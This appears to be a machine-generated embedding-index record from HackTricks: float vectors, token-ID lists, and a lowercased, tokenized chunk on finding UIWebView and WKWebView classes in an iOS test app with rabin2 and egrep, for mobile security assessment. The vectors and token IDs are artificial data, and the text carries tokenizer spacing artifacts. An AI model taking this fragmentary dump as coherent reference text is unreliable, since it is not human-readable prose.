0.4543069899082184, -0.4743724763393402, -0.2512471675872803, -0.09623582661151886, 0.03749386966228485, -0.18224655091762543, 0.2714594304561615, -0.4726503789424896, -0.14592747390270233, 0.06966035068035126, -0.2920025885105133, 0.18572399020195007, 0.35361650586128235, -0.23986147344112396, 0.04206046834588051, 0.24585191905498505, -0.706640899181366, -0.5665921568870544, -0.18810611963272095, -0.1117553636431694, -0.24499639868736267, 0.5064043402671814, 0.09132067859172821, 0.3105558753013611, 0.6051747798919678, -0.38788822293281555, -0.5209228992462158, 0.22999995946884155, 0.895639955997467, -0.4493059813976288, 0.791685938835144, 0.7146803140640259, -0.5395026206970215, 0.32926473021507263, 0.05281815677881241, 0.6357108354568481, 0.03565218299627304, -0.4631209373474121, -0.278935968875885, 0.06471402943134308, -0.20565059781074524, -0.11330793797969818, -0.08757176250219345, -0.3063986301422119, -0.3321991264820099, -0.1166619285941124, -1.0985584259033203, 0.15002833306789398, -0.6055892109870911, 0.5657424926757812, 0.2915968894958496, 0.06670250743627548, -0.08408021926879883, -0.2529350817203522, 0.6460385918617249, -1.3397784233093262, 4.369601249694824, 0.5511810183525085, 0.16158005595207214, 0.029166020452976227, 0.17787212133407593, 0.1061951294541359, 1.0785911083221436, -0.809077799320221, -0.2912290692329407, 0.026416568085551262, -0.061779480427503586, 0.04749218001961708, 0.44149303436279297, -0.003995518200099468, -0.20557115972042084, 0.3616587221622467, -0.41967475414276123, 0.22458593547344208, -0.16773563623428345, -0.6605967879295349, -1.098301887512207, 0.0862216129899025, -0.3864310681819916, 0.6676719188690186, 0.5915323495864868, 0.4166680872440338, 0.15322068333625793, -0.5416260361671448, -0.39547282457351685, -0.951920211315155, 0.0679687112569809, -0.10195358097553253, 0.5008727312088013, -0.532961368560791, -0.5561346411705017, 0.4992094337940216, 0.32962584495544434, -0.853343665599823, -0.24555473029613495, 0.35877925157546997, 0.02112213335931301, -0.5578569769859314, 0.3548241853713989, -0.7842006683349609, -0.26307734847068787, -0.052957821637392044, -0.48494356870651245, -0.2641853988170624, 0.9675235748291016, -0.27833980321884155, 0.9294809103012085, -0.4984131455421448, 0.3239559531211853, -0.19808374345302582, -0.4802848696708679, 0.13692796230316162, -0.11413614451885223, -0.10073068737983704, 0.055571917444467545, -0.2709721028804779, 1.08448326587677, -0.5833626985549927, 0.16210196912288666, -0.790168046951294, -0.8963196277618408, 0.3784365653991699, 0.054342567920684814, 1.4121499061584473, -0.2757759094238281, -0.27672070264816284, -0.1326357126235962, -0.025768164545297623, -0.16836006939411163, 0.006823885720223188, 0.8551114797592163, -0.2704896628856659, 0.3285004198551178, 0.3315112888813019, 1.0246193408966064, -1.2424598932266235, -0.16828511655330658, -0.18036071956157684, -0.8850514888763428, 0.6246449947357178, 0.8129058480262756, 0.5227068066596985, -0.25683093070983887, -0.9838853478431702, -0.01942664012312889, 0.24265073239803314, 0.6533380746841431, 0.0015146862715482712, -0.3209185302257538, -0.1581307053565979, 0.2818177342414856 ]
[ 101, 16380, 4773, 8584, 26760, 15878, 8584, 2015, 4127, 8545, 2497, 8584, 2015, 2024, 1999, 1011, 10439, 16602, 6177, 2005, 14962, 9123, 4773, 4180, 1012, 2027, 2064, 2022, 2109, 2000, 7861, 8270, 4773, 4180, 3495, 2046, 2019, 10439, 1005, 1055, 5310, 8278, 1012, 16380, 4773, 8584, 2015, 2490, 9262, 22483, 7781, 2011, 12398, 1010, 2061, 5896, 13341, 1998, 2892, 1011, 2609, 5896, 2075, 4491, 2064, 7461, 2068, 1012, 21318, 8545, 2497, 8584, 1024, 21318, 8545, 2497, 8584, 2003, 2139, 28139, 12921, 3225, 2006, 16380, 2260, 1998, 2323, 2025, 2022, 2109, 1012, 2009, 5807, 1005, 1056, 2022, 2109, 1012, 9262, 22483, 3685, 2022, 9776, 1012, 1059, 2243, 8545, 2497, 8584, 1024, 2023, 2003, 1996, 6413, 3601, 2005, 8402, 10439, 15380, 1010, 9756, 6913, 4180, 1012, 9262, 22483, 2003, 9124, 2011, 12398, 2021, 4283, 2000, 1996, 9262, 22483, 8189, 23242, 3200, 1997, 1059, 2243, 8545, 2497, 8584, 1010, 2009, 2064, 2022, 3294, 9776, 1010, 10723, 2035, 5896, 13341, 21407, 1012, 1996, 9262, 22483, 23803, 11837, 11101, 15568, 4887, 20389, 12070, 3973, 2064, 2022, 2109, 2000, 4652, 9262, 22483, 2013, 3098, 2047, 3645, 1010, 2107, 2004, 3769, 1011, 11139, 1012, 1996, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 3200, 2064, 2022, 2109, 2000, 20410, 4219, 8209, 2011, 1996, 4773, 8584, 2024, 5140, 2083, 4372, 26775, 22571, 3064, 7264, 1012, 1059, 2243, 8545, 2497, 8584, 22164, 2041, 1011, 1997, 1011, 2832, 14259, 1010, 2061, 3638, 7897, 12883, 2180, 1005, 1056, 7461, 1996, 2364, 10439, 2832, 1012, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 1024, 2009, 2323, 2022, 2109, 2000, 3073, 1037, 18960, 4773, 10523, 3325, 1012, 2122, 4773, 8584, 2015, 2064, 2022, 4089, 7282, 2004, 2027, 2031, 1037, 8281, 9621, 2029, 2950, 1996, 2206, 3787, 1024, 1037, 3191, 1011, 2069, 4769, 2492, 2007, 1037, 3036, 17245, 1012, 2019, 2895, 1006, 1000, 3745, 1000, 1007, 6462, 1012, 1037, 2589, 6462, 1010, 2067, 1998, 2830, 9163, 11287, 1010, 1998, 1037, 1000, 23591, 1000, 6462, 2000, 2330, 1996, 3931, 3495, 1999, 23591, 1012, 9262, 22483, 3685, 2022, 9776, 1999, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 1998, 2023, 2003, 2028, 1997, 1996, 4436, 2339, 1996, 8192, 1997, 1059, 2243, 8545, 2497, 8584, 2003, 6749, 2043, 1996, 3125, 2003, 8402, 1996, 10439, 1005, 1055, 5310, 8278, 1012, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 2036, 6661, 16324, 1998, 2060, 4037, 2951, 2007, 23591, 1012, 1996, 5310, 1005, 1055, 4023, 1998, 8290, 2007, 1037, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 2024, 2025, 5710, 2000, 1996, 10439, 1010, 2029, 3685, 3229, 8285, 8873, 3363, 2951, 1010, 11347, 2075, 2381, 1010, 2030, 4037, 2951, 1012, 2429, 2000, 1996, 10439, 3573, 3319, 11594, 1010, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 2015, 2089, 2025, 2022, 5023, 2030, 23649, 2011, 2060, 5328, 2030, 9014, 1012, 13648, 4773, 8584, 2015, 22354, 29336, 2594, 4106, 10179, 8545, 2497, 8584, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 1041, 17603, 2361, 1000, 21318, 8545, 2497, 8584, 1002, 1000, 4466, 2683, 1014, 2595, 8889, 2692, 2475, 7959, 2063, 2683, 1014, 2595, 18613, 2692, 2475 ]
hack_tricks
435.txt
0
##fee9 9 10 ( 5. _ _ text. _ _ cstring ) ascii uiwebview896 0x0003c813 0x0003c813 24 25 ( ) ascii @ _ objc _ class _ $ _ uiwebview1754 0x00059599 0x00059599 23 24 ( ) ascii _ objc _ class _ $ _ uiwebviewwkwebview $ rabin2 - zz. / wheresmybrowser | egrep " wkwebview $ " 490 0x0002fef3 0x10002fef3 9 10 ( 5. _ _ text. _ _ cstring ) ascii wkwebview625 0x00031670 0x100031670 17 18 ( 5. _ _ text. _ _ cstring ) ascii unwindtowkwebview904 0x0003c960 0x0003c960 24 25 ( ) ascii @ _ objc _ class _ $ _ wkwebview1757 0x000595e4 0x000595e4 23 24 ( ) ascii _ objc _ class _ $ _ wkwebviewalternatively you can also search for known methods of these webview classes. for example, search for the method used to initialize a wkwebview ( init ( frame : configuration : ) ) : $ rabin2 - zzq. / wheresmybrowser | egrep " wkwebview. * frame " 0x5c3ac 77 76 _ _ t0so9wkwebviewcabsc6cgrectv5frame _ so0ab13configurationc13configurationtcfc0x5d97a 79 78 _ _ t0so9wkwebviewcabsc6cgrectv5frame _ so0ab13configurationc13configurationtcfcto0x6b5d5 77 76 _ _ t0so9wkwebviewcabsc6cgrectv5frame _ so0ab13configurationc13configurationtcfc0x6c3fa 79
[ -0.03892652317881584, 0.2848997414112091, -0.40947863459587097, -0.08933348953723907, -0.30697500705718994, 0.18840932846069336, -0.04425914213061333, 0.5119591951370239, 0.8397689461708069, 0.6799212098121643, -0.4474288821220398, 0.2348603457212448, 0.3836996853351593, -0.0037792634684592485, -0.41330865025520325, -0.5350459218025208, -0.7100598812103271, -0.8492006063461304, -1.2045029401779175, 0.1710965931415558, -0.12983953952789307, 0.08494428545236588, -1.6102627515792847, -1.0227313041687012, -0.15909090638160706, 0.8906797766685486, 1.063154697418213, -0.31179043650627136, 0.7806109189987183, 0.6553273797035217, 0.08468359708786011, -0.32774513959884644, 0.24026000499725342, -0.7479411363601685, -0.03968093544244766, 0.14608995616436005, 0.8400245308876038, -0.3194626569747925, -0.4214976727962494, -0.5223428606987, 0.009898160584270954, -0.5168057084083557, 0.2961910665035248, -0.28055334091186523, 0.03500032424926758, -0.649236261844635, -0.07266867905855179, -0.1252051591873169, 0.132975772023201, 0.04637454077601433, 0.6328501105308533, 0.024668481200933456, 0.12399815768003464, -0.3118664026260376, -0.06946011632680893, 0.1713925153017044, -0.2800341844558716, -0.3160765767097473, -0.5793920755386353, 0.30409514904022217, -0.24015586078166962, 0.42028236389160156, 0.8190255165100098, -1.1061731576919556, 0.057727932929992676, 0.3670462667942047, 0.7211428880691528, -0.3512851297855377, -0.24122180044651031, -0.2118324190378189, -0.17104580998420715, 0.8666069507598877, -1.006580114364624, 0.03988947346806526, -0.7850778698921204, 0.31802359223365784, -0.7420077323913574, 0.059369850903749466, 0.10247361660003662, 0.40186741948127747, -0.21579992771148682, 0.4883907735347748, 0.4048232138156891, 0.10971294343471527, -0.39105355739593506, -0.6228044629096985, 0.15541701018810272, 0.6546134948730469, -0.39843371510505676, 0.718318521976471, 0.4073512554168701, 0.4027765989303589, -0.6787577271461487, -0.1780712753534317, 0.3023870587348938, 0.6447135806083679, -0.4872640073299408, 0.23004677891731262, 0.02216341719031334, 0.0636812299489975, 0.833088755607605, 1.3344706296920776, 0.2915351986885071, 0.9754831790924072, -0.9242066144943237, -0.02566629648208618, -0.19349169731140137, -0.11302012205123901, 0.36795657873153687, -0.1492028385400772, 0.2457064539194107, -0.07707323879003525, 0.44075319170951843, -0.4949927031993866, 0.07475720345973969, 0.07185544818639755, 0.38302358984947205, 0.15402765572071075, -0.7335489392280579, 0.5029175877571106, 0.02661069855093956, 0.01413507480174303, 0.4815185070037842, 0.0012681137304753065, -0.09973479062318802, 0.190768763422966, 0.015820639207959175, 0.9382343888282776, -0.4471836984157562, -0.00047831772826611996, -0.23937970399856567, -0.9990077018737793, -0.6310740113258362, 0.15010833740234375, -0.22805611789226532, 0.19493718445301056, -0.8701481223106384, -0.0627618134021759, 0.706506609916687, -0.9094065427780151, 0.2326744645833969, 0.9371591210365295, 0.002094080438837409, 1.9955276250839233, 0.6214452981948853, 0.28904905915260315, 0.02095230109989643, -0.8181396126747131, -0.48675450682640076, -0.018335171043872833, -0.36983367800712585, -0.24355190992355347, 0.7482721209526062, -0.7491142749786377, -0.719933807849884, 0.5584995150566101, -0.745845377445221, 0.41465505957603455, -0.611021876335144, 0.2741183638572693, 0.025688806548714638, 0.6555262804031372, -0.4133983254432678, 0.1280352622270584, -0.5429964065551758, -0.05616816505789757, -0.34980618953704834, -0.22890014946460724, -0.44521984457969666, 0.13207696378231049, 0.6916037797927856, 0.243476003408432, -0.4706699550151825, -0.03688344359397888, 0.9406643509864807, 0.8676387667655945, -0.028361227363348007, -0.22183994948863983, 0.43552646040916443, 0.7245122790336609, 0.048572052270174026, 0.7815160155296326, 0.38170740008354187, 0.5998680591583252, 0.30307069420814514, -0.012162910774350166, -0.8498430252075195, -1.1763556003570557, -0.15564677119255066, -0.20900845527648926, -0.46185681223869324, 0.4958571195602417, -0.6935944557189941, 0.515995442867279, 0.3634197413921356, 0.6962591409683228, -1.090179681777954, -0.07501593232154846, 0.008569612167775631, -1.566755771636963, -0.5696922540664673, 0.4480961561203003, -0.9271579384803772, 0.632429301738739, -0.3607921004295349, -0.3159599006175995, 0.5438582897186279, 0.8824254274368286, 0.030069945380091667, 0.6609311103820801, 0.7056529521942139, -0.052618205547332764, -0.5127168297767639, 0.057523492723703384, 1.0426725149154663, 0.13215656578540802, -0.6657543182373047, 0.569728434085846, -0.580357551574707, -0.26624301075935364, 0.7811967134475708, 0.8485730290412903, 0.6213402152061462, 0.6235668063163757, -0.43085262179374695, -0.009290060959756374, 0.6231788992881775, 0.529862642288208, -0.20630575716495514, 0.07010483741760254, -0.17545762658119202, 0.2694375813007355, 0.7058627605438232, 0.9595239758491516, 0.6139984726905823, -0.02934441901743412, 0.36311277747154236, 0.8402026295661926, -0.05343586578965187, -0.4803912043571472, -0.3789582848548889, 0.644097626209259, 0.5190809369087219, 0.6394134759902954, 0.13268055021762848, 0.4386557638645172, -0.00808757171034813, -0.0552498959004879, 0.18025071918964386, 0.6833556294441223, 0.17883267998695374, 0.7739374041557312, 0.7116490006446838, -0.10817012935876846, -0.8670251369476318, -0.1103266254067421, 0.7092331647872925, 0.9613518714904785, -0.4397776424884796, -0.6861041784286499, -0.42764565348625183, -0.29981058835983276, -0.14971108734607697, -0.4873363971710205, 0.45710569620132446, 0.37191706895828247, 0.03520280122756958, 0.14678840339183807, -0.4620572626590729, -0.9348315000534058, -0.9740402102470398, -0.46159833669662476, -0.9680875539779663, -0.6905495524406433, -1.0829432010650635, -0.10476193577051163, 0.8898224830627441, 0.23255811631679535, 0.40183207392692566, 0.20556631684303284, -1.1254440546035767, -0.3228224515914917, -0.45026570558547974, 0.7011656165122986, 0.3556469976902008, 0.3662567436695099, -0.8700211644172668, -0.04761169105768204, -0.23489710688591003, 0.9141926169395447, -0.4754176735877991, 0.2911708950996399, -0.1903410702943802, -0.3689432144165039, 0.22856590151786804, -0.6436799764633179, 0.29321593046188354, -0.26530763506889343, -0.21532616019248962, -0.6530899405479431, -0.0865115076303482, 0.06598857045173645, 0.1541776806116104, 0.04485864192247391, -0.4096880853176117, 0.760871410369873, -0.14878331124782562, -0.12183070182800293, 0.7875708341598511, 0.6066992282867432, -0.6070951223373413, 0.9135502576828003, 0.08892034739255905, 0.5931808948516846, -0.7778595089912415, 0.9515926837921143, 0.5609287023544312, 0.6647964715957642, -0.267098993062973, -0.0558871254324913, 0.07123488932847977, -0.3035735785961151, -0.23719927668571472, -0.25872668623924255, -0.16179586946964264, 0.38266026973724365, 0.07255092263221741, -1.2324740886688232, -0.5788843631744385, -0.11838366836309433, -0.06302712112665176, -0.5118463635444641, -0.7452414631843567, 0.9458948969841003, 1.1104702949523926, 0.4665652811527252, 0.4972245693206787, -0.3156231939792633, -0.10896646231412888, -0.3103695213794708, 0.4370408356189728, -0.5306750535964966, 0.30395087599754333, 0.8807087540626526, -0.8843007683753967, 0.5547856092453003, -0.1785980761051178, -0.18006841838359833, -0.09896623343229294, -0.018842022866010666, 0.17631550133228302, -0.3471701145172119, 0.3570503294467926, 0.2525976896286011, -0.5539993643760681, 0.5117464065551758, -0.863487184047699, -0.1815493255853653, -0.23512490093708038, -0.48506247997283936, 1.0156124830245972, 0.14930345118045807, 0.3122674822807312, -0.16772499680519104, -0.34727218747138977, -0.37765198945999146, 0.16738249361515045, 0.27987587451934814, 0.5417148470878601, 0.1483110934495926, 0.7172592878341675, 0.612636148929596, 0.24939656257629395, 0.6920803785324097, -0.1217433512210846, -0.5412893295288086, 0.6165364980697632, 0.3354300856590271, 0.5516901016235352, -0.08035644143819809, -0.02183733507990837, 0.2039170116186142, 0.47591158747673035, 0.8388676643371582, -0.01455334760248661, 0.06810878217220306, -0.36162030696868896, -0.8507909178733826, 0.20555400848388672, -0.6629984378814697, 0.07888960838317871, -0.2701103091239929, 0.11685959249734879, 0.07774018496274948, -0.8192034363746643, -0.6208992004394531, 0.0762489065527916, 0.249434232711792, 0.7734073400497437, -0.0760098546743393, -0.012238307856023312, 0.286435604095459, 0.21686400473117828, 0.18660613894462585, -0.9433578252792358, -0.04956420883536339, -0.21222227811813354, 0.9360033869743347, 0.4881590008735657, -0.3458471894264221, -0.12168096750974655, 0.13886182010173798, -0.0949353352189064, -0.02767874300479889, 0.08678777515888214, 0.09837228059768677, -0.5731764435768127, 0.03330288082361221, 0.21960796415805817, 0.26428794860839844, -0.9733086228370667, -0.10792286694049835, 0.41796374320983887, 0.5239045023918152, 0.9515947699546814, -0.5986490249633789, 0.47026118636131287, -0.9359619617462158, 0.5273223519325256, 0.4937622845172882, -0.0973331555724144, -0.1659303605556488, -0.7424669861793518, 0.021177057176828384, -0.4428519010543823, 0.06685200333595276, 0.3167409896850586, 0.8517264723777771, 0.3867966830730438, -1.3427962064743042, 0.34102150797843933, 0.3702201545238495, -0.2110564410686493, -0.3802015483379364, -0.5083642601966858, 0.006472053471952677, 0.9170050024986267, 0.2107655256986618, -0.3444232940673828, -0.6778955459594727, -0.06650330871343613, -0.7601720094680786, 0.7088193893432617, -0.679812490940094, 0.19942119717597961, 0.21555569767951965, 0.10516920685768127, -0.3109450340270996, 0.2639767527580261, -0.14146383106708527, -0.16344843804836273, -0.017056407406926155, 0.5436501502990723, -0.14167453348636627, -0.5920349359512329, 0.9300796389579773, 0.07433567941188812, -0.12774810194969177, 0.22788240015506744, 0.40749239921569824, -0.06169586628675461, 0.04558735713362694, -0.1585143506526947, -0.3592629134654999, 0.7045414447784424, -1.1548594236373901, 0.27495938539505005, 0.6261984705924988, -0.30066680908203125, 0.3028782904148102, -0.334831565618515, 0.38774415850639343, 0.012434402480721474, -0.23555494844913483, -0.663347065448761, -0.9705164432525635, -0.2319902926683426, 0.2824172079563141, -0.08397077769041061, 0.1528102308511734, 0.7022815346717834, -0.14542707800865173, -0.1474105566740036, -0.49950137734413147, -0.21843649446964264, -0.975913941860199, -0.48140501976013184, 0.05640808492898941, 0.44812285900115967, -0.07389187812805176, 0.8263499736785889, -0.28346821665763855, -0.6711336970329285, 0.1217559352517128, -0.5356372594833374, 0.43669915199279785, -1.192836046218872, 0.13307102024555206, -0.6145477890968323, 0.17807723581790924, 0.015624073334038258, -0.008788937702775002, -0.28450408577919006, -0.5585396885871887, -0.24042712152004242, 0.7643811106681824, 0.635321855545044, -0.6796128153800964, -0.028152726590633392, 1.1516692638397217, -0.18605253100395203, -0.6424182653427124, -0.16497817635536194, 0.5814458727836609, 0.2121911346912384, 0.6658399105072021, -0.012697923928499222, -0.5053859949111938, -1.0772095918655396, -1.075918197631836, -0.02685415744781494, -0.5110360980033875, 0.08404143154621124, -0.34688320755958557, -0.4115460216999054, -0.30386385321617126, 0.5663987398147583, -0.5238843560218811, -0.5139803290367126, 0.09792407602071762, -0.32634976506233215, -0.7345628142356873, -0.40663009881973267, -0.10063803195953369, 0.028668180108070374, 0.0028461685869842768, 0.5693232417106628, 0.6413525938987732, 0.11071032285690308, 0.37742435932159424, -0.22460409998893738, 0.08015888929367065, 0.628210723400116, 0.05372978001832962, -0.3604682683944702, -0.03292599320411682, -0.19160203635692596, -0.579810380935669, -0.29377564787864685, 0.24485887587070465, -0.7389354705810547, 0.454635351896286, -0.29008278250694275, -0.5810517072677612, 0.3746545612812042, -0.3960064947605133, 0.1410355567932129, -0.34925803542137146, 0.7484637498855591, -0.7010900378227234, 0.09454382956027985, 0.0532173290848732, 0.7102324962615967, 0.5975835919380188, -0.40386927127838135, -0.6524977087974548, -0.2629278898239136, -0.589593231678009, -0.8217937350273132, 0.8910161852836609, 0.09472386538982391, -0.39564430713653564, 0.07389110326766968, 0.47972163558006287, 0.6378651857376099, -0.31230002641677856, 0.741317868232727, 0.7293740510940552, -0.06107162684202194, 0.2148013561964035, -0.8739001154899597, 0.3723679184913635, 0.16277986764907837, 0.02885252609848976, -0.2550324499607086, 0.0019236955558881164, -0.3181682229042053, 0.29549404978752136, -0.3543226420879364, -0.1883435994386673, -0.5510098934173584, -0.22447846829891205, 0.7982320785522461, 0.06825011968612671, 0.6847772002220154, -0.5746258497238159, -1.1065728664398193, -0.16674262285232544, 0.5855073928833008, 0.07389995455741882, -0.13423140347003937, 0.7367004752159119, -0.004232546780258417, 0.5044545531272888, 0.2515992522239685, -0.30641210079193115, -0.5445428490638733, -0.2211395800113678, 0.8158960938453674, -0.22837954759597778, -0.07896710932254791, 0.6355059146881104, 0.42131516337394714, -1.3228002786636353, -0.32635295391082764, -0.43953749537467957, -0.009844226762652397, -0.15683254599571228, -0.3632897138595581, -0.4964902698993683, 0.1946370154619217, 0.7087081670761108, 0.36383840441703796, 0.6935937404632568, 0.4394574463367462, 0.2678876221179962, -0.31397736072540283, 0.7149544358253479, 0.13515551388263702, 0.3217516243457794, 0.8721895813941956, -0.7850289940834045, -0.8251772522926331, -0.3736279606819153, 0.01326286606490612, 0.30843544006347656, -0.19402113556861877, 1.0095977783203125, -0.4613839089870453, 0.748225748538971, 0.20578743517398834, -0.3520858585834503, 1.1627498865127563, -0.16069439053535461, 0.16421912610530853, 0.48224931955337524, 0.7052512168884277, -0.7025685906410217, -0.3300534188747406, 0.821326732635498, 0.24724215269088745, 0.6317473649978638, -0.27267736196517944, -0.3399003744125366, 0.26903727650642395, 0.14598985016345978, -0.568113386631012, -0.21846802532672882, -1.4335122108459473, -0.8468505144119263, -0.7586001753807068, 0.4922544062137604, -0.24490757286548615, -0.20097926259040833, -0.2783111035823822, -0.3109671473503113, -0.47654056549072266, -0.1592368334531784, -0.3253931999206543, -0.2927757203578949, 0.36397019028663635, -0.5214241147041321, 0.5303518772125244, -0.9842891693115234, -0.594549834728241, -0.04501901566982269, -0.4764704406261444, -0.6791324019432068, -0.43419405817985535, -0.3704572021961212, 0.05099918693304062, -0.7430802583694458, 0.15601010620594025, -0.38455280661582947, -0.40346774458885193, -0.05152503401041031, -0.43072783946990967, 0.240122988820076, 0.9166188836097717, -0.41183310747146606, 0.5296902060508728, 0.32665765285491943, 0.5085083246231079, 0.35552793741226196, 0.19840200245380402, -0.12667641043663025, 0.65119868516922, -0.15094712376594543, 0.295889288187027, 0.06475093960762024, -0.38339194655418396, 0.3993741571903229, -0.06773064285516739, -0.48741990327835083, -0.20478105545043945, -0.008651994168758392, -0.4378815293312073, 0.47693488001823425, 0.06252624839544296, 0.17902743816375732, 0.6312568187713623, -0.010584969073534012, 0.22757871448993683, -1.2451823949813843, 0.14094911515712738, 0.26845139265060425, -0.7121162414550781, 0.003835149807855487, 0.40216636657714844, 0.7354426383972168, -0.11335862427949905, 0.5547979474067688, 0.20553869009017944, -0.42311134934425354, 0.4921776056289673, -0.21940207481384277, -0.17020894587039948, -0.6420581340789795, -0.263126939535141, 0.6346818208694458, 0.3725423812866211, 0.5850939154624939, -0.6595128178596497, 0.2025383859872818, 0.1291871964931488, -0.9652014970779419, 0.12337492406368256, -0.9600619077682495, -0.5836287140846252, 0.30862101912498474, -0.5148690938949585, -0.48924699425697327, -0.316160649061203, -0.43288031220436096, 0.8421629667282104, -0.15161511301994324, -0.5711808204650879, 0.1264285445213318, -0.37011727690696716, -0.20736782252788544, 0.7817296385765076, -0.9193131327629089, -0.6083820462226868, -0.1027773767709732, 0.08409933745861053, -0.9326600432395935, -0.9492596387863159, 0.3522048592567444, 0.48916444182395935, 0.00926634855568409, -0.4010216295719147, -0.24902038276195526, 0.05645342171192169, 0.08608779311180115, -0.021963125094771385, -0.3046201765537262, 0.24622707068920135, -0.5039451122283936, 0.3069559633731842, -0.5917689800262451, -0.12825925648212433, -0.16680356860160828, -0.003074814099818468, 0.5817586779594421, -0.4542079567909241, 0.10296261310577393, 0.5504244565963745, 0.22606348991394043, -0.3168519139289856, 0.7376878261566162, 0.3704216778278351, 0.10192137211561203, -0.1385449469089508, 0.09376661479473114, -0.31949520111083984, 0.17514194548130035, 0.429537296295166, -0.1703803688287735, 0.08899488300085068, 0.8487210869789124, 0.6874430775642395, -0.21374577283859253, -0.2639753222465515, 0.8005170226097107, 0.3543369472026825, -0.3919880986213684, -0.1515773981809616, -0.3842897415161133, -0.2270682454109192, 0.39268261194229126, -0.422839492559433, 0.11605627089738846, 0.14493326842784882, -0.21510298550128937, 0.01892477087676525, -0.27161693572998047, 0.8842808604240417, -0.8322311043739319, 0.4197328984737396, -0.39580869674682617, -0.004483050666749477, -0.052936118096113205, -0.18031460046768188, -0.6511999368667603, 0.9271104335784912, 0.5956800580024719, 0.6031666398048401, 0.08430939167737961, 0.5965763330459595, -0.8890299201011658, 0.2672472596168518, 0.294195294380188, -0.15304836630821228, -0.05044008791446686, 0.2855393588542938, -0.22571851313114166, -0.9572434425354004, -0.4013407826423645, 0.17242731153964996, -0.22766554355621338, -0.2825886905193329, 0.7964982986450195, 0.07960250228643417, -0.15487097203731537, 0.04655211791396141, 0.12641166150569916, -0.3774363100528717, 0.7368142008781433, 0.3975304663181305, -0.2945767939090729, -0.6298902630805969, 0.8769819140434265, 0.5264461636543274, 0.7538980841636658, 0.007707127369940281, 0.5366358160972595, -0.26883959770202637, 0.5277565121650696, 0.061685960739851, -0.4792466163635254, -0.12356209754943848, 0.1321229636669159, 0.2355344146490097, -0.7606215476989746, -0.12411334365606308, -0.589930534362793, 0.6180781126022339, -0.06113819405436516, -0.6320598125457764, -0.30741021037101746, 0.33856654167175293, -0.6640167832374573, -0.6038537621498108, 0.82646244764328, -0.3982618451118469, -0.35047978162765503, 0.5221558809280396, -0.17241579294204712, 0.42135563492774963, 0.6039901971817017, -0.3147580325603485, -0.6193460822105408, -0.05342341586947441, -0.4748150706291199, -0.5354255437850952, 0.9597559571266174, -0.6683291792869568, 0.308961421251297, -0.3516745865345001, -1.1241031885147095, -0.7685826420783997, -0.2807557284832001, -0.18561510741710663, -0.8668883442878723, 0.03829603269696236, 0.9815473556518555, 0.13492600619792938, 0.7058011293411255, -0.39081209897994995, -0.075257807970047, 0.40461331605911255, 0.6790817379951477, 0.034031227231025696, 0.5859534740447998, 0.8167751431465149, -0.5787344574928284, 0.4682116210460663, -0.15418629348278046, 0.9221715331077576, -0.1974084973335266, -0.04972144216299057, -0.43592172861099243, 0.02320040389895439, -0.49796685576438904, -0.8106337189674377, 0.17253245413303375, -0.32774466276168823, -0.06006794050335884, -0.5196142196655273, -1.5082262754440308, 0.36984771490097046, -0.41119518876075745, 0.13666434586048126, -0.4995203912258148, 0.1599181741476059, 0.6838439702987671, 0.40013349056243896, 0.2196810394525528, -1.6137747764587402, 4.120908737182617, 0.5456343293190002, 0.10625509917736053, -0.39707913994789124, 0.4429154694080353, 0.502895176410675, 1.5666800737380981, -0.5615822672843933, -0.42837655544281006, -0.3092783987522125, -0.03597162291407585, 0.22446079552173615, 0.8644806742668152, 0.25429898500442505, 0.3539600968360901, 0.984629213809967, -0.2712889015674591, 0.10290762037038803, 0.23094044625759125, -1.129766821861267, -0.5541731715202332, 0.32492780685424805, -0.5158559083938599, 0.9628633260726929, 0.6244124174118042, 0.28834864497184753, 0.05058404803276062, -1.6595666408538818, -0.026504363864660263, -0.4465634822845459, 0.24230796098709106, 0.007740158587694168, -0.1490919440984726, -0.5797669887542725, -0.3989304006099701, 0.10685401409864426, -0.04804741591215134, -1.2691094875335693, -0.0725557804107666, 0.41524970531463623, 0.11291926354169846, -0.4320032000541687, 0.09665687382221222, -0.6600303649902344, 0.3035299479961395, 0.693001389503479, -0.6624439358711243, 0.23672549426555634, 0.7783858180046082, -0.727964460849762, 0.5995307564735413, 0.04758325219154358, 0.6233707666397095, 0.46703410148620605, -0.5312831997871399, 0.3631087839603424, 0.40228089690208435, -0.3382335305213928, -0.1382913887500763, -0.03349066525697708, 0.21558953821659088, -0.5877470970153809, 0.21093370020389557, -0.1261691153049469, -1.2767558097839355, 0.624075174331665, -0.2100987434387207, 0.12233351916074753, -0.8671107888221741, -0.26588067412376404, 0.050022825598716736, -0.45291653275489807, -0.5913278460502625, -0.04069223254919052, 1.3970563411712646, 0.3203054368495941, 0.12936368584632874, 0.3499901592731476, 0.6217938661575317, -0.7603369355201721, -0.18658514320850372, -0.8729828000068665, -0.7237405776977539, 0.829176127910614, 0.3754499852657318, 0.5876632928848267, -0.24184466898441315, -0.44408339262008667, -0.014712225645780563, 0.1946834921836853, 0.6729365587234497, 0.45330488681793213, -0.45614591240882874, -0.011556893587112427, 0.24142234027385712 ]
[ 7959, 2063, 2683, 1023, 2184, 1006, 1019, 1012, 1035, 1035, 3793, 1012, 1035, 1035, 20116, 18886, 3070, 1007, 2004, 6895, 2072, 21318, 8545, 2497, 8584, 2620, 2683, 2575, 1014, 2595, 8889, 2692, 2509, 2278, 2620, 17134, 1014, 2595, 8889, 2692, 2509, 2278, 2620, 17134, 2484, 2423, 1006, 1007, 2004, 6895, 2072, 1030, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 21318, 8545, 2497, 8584, 16576, 27009, 1014, 2595, 8889, 2692, 28154, 28154, 2683, 1014, 2595, 8889, 2692, 28154, 28154, 2683, 2603, 2484, 1006, 1007, 2004, 6895, 2072, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 21318, 8545, 2497, 8584, 26291, 8545, 2497, 8584, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 1012, 1013, 2073, 6491, 2100, 12618, 9333, 2121, 1064, 1041, 17603, 2361, 1000, 1059, 2243, 8545, 2497, 8584, 1002, 1000, 22288, 1014, 2595, 8889, 2692, 2475, 7959, 2546, 2509, 1014, 2595, 18613, 2692, 2475, 7959, 2546, 2509, 1023, 2184, 